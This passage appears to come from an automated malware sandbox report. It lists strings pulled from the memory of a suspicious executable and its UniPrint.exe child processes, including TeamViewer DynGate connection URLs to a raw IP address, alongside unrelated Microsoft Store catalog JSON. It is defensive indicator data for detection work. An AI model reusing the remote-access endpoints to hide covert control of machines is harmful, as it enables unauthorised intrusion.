N","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/
Source: UniPrint.exe, 00000005.00000003.716845833.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/EM
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=100000012
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001K
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=1000
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1014947497.00000000057B2000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002.
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=100000023321935-2125563209-405306
Source: UniPrint.exe, 00000005.00000003.714775003.00000000057B2000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/din.aspx?s=12251267&m=fast&client=DynGate&p=10000002Z
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGate
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000001&client=DynGatepzm
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate
Source: UniPrint.exe, 00000005.00000002.1072952284.0000000000AE8000.00000004.00000020.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGate:%
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGateZ
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: http://188.172.235.146/dout.aspx?s=12251267&p=10000002&client=DynGatellow
Source: wogZe27GBB.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: wogZe27GBB.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: svchost.exe, 00000010.00000002.817773606.00000217C6F00000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wogZe27GBB.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: svchost.exe, 00000010.00000002.817452731.00000217C68E9000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
Source: UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmpString found in binary or memory: http://crl.verisign.co
Source: UniPrint.exe, 0000000A.00000002.757533910.0000000000B88000.00000004.00000020.sdmpString found in binary or memory: http://crl.verisign.corl0
Source: wogZe27GBB.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: wogZe27GBB.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: wogZe27GBB.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: wogZe27GBB.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: wogZe27GBB.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://go.teamviewer.comn0
Source: UniPrint.exe, 00000005.00000003.710224733.00000000057D9000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001;
Source: UniPrint.exe, 00000005.00000003.709879277.00000000057F0000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001ndows.Phot
Source: UniPrint.exe, 00000005.00000002.1075966656.0000000005820000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001s
Source: UniPrint.exe, 00000005.00000002.1073157453.0000000000B65000.00000004.00000020.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047145&client=DynGate&p=10000002u
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047152&client=DynGate&p=100000026
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.710194245.00000000057D4000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047159&client=DynGate&p=100000023v
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713534320.0000000005721000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002
Source: UniPrint.exe, 00000005.00000003.715254848.0000000005801000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/din.aspx?s=42047224&client=DynGate&p=10000002321935-2125563209-405306
Source: UniPrint.exe, 00000005.00000002.1073179417.0000000000B68000.00000004.00000020.sdmpString found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5Mko
Source: UniPrint.exe, 00000005.00000002.1073127658.0000000000B5D000.00000004.00000020.sdmpString found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6s
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713565888.000000000576A000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000003.713161991.00000000057D0000.00000004.00000001.sdmpString found in binary or memory: http://master13.teamviewer.com/dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeq
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://mastr13.teamv
Source: UniPrint.exe, 00000005.00000002.1075067789.0000000003B1C000.00000004.00000001.sdmpString found in binary or memory: http://mastr13.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=2
Source: wogZe27GBB.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: wogZe27GBB.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wogZe27GBB.exeString found in binary or memory: http://ocsp.digicert.com0C
Source: wogZe27GBB.exeString found in binary or memory: http://ocsp.digicert.com0O
Source: wogZe27GBB.exeString found in binary or memory: http://ocsp.sectigo.com0
Source: UniPrint.exe, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.TeamViewer.com
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.TeamViewer.com/download
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.TeamViewer.com/help
Source: wogZe27GBB.exeString found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
Source: nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000000.684861880.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000000.698733412.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.756410027.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000002.759885262.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000000.758970133.0000000000733000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000002.778184105.0000000000733000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 00000010.00000003.794457434.00000217C6F81000.00000004.00000001.sdmpString found in binary or memory: https://displaycatalog.m(
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
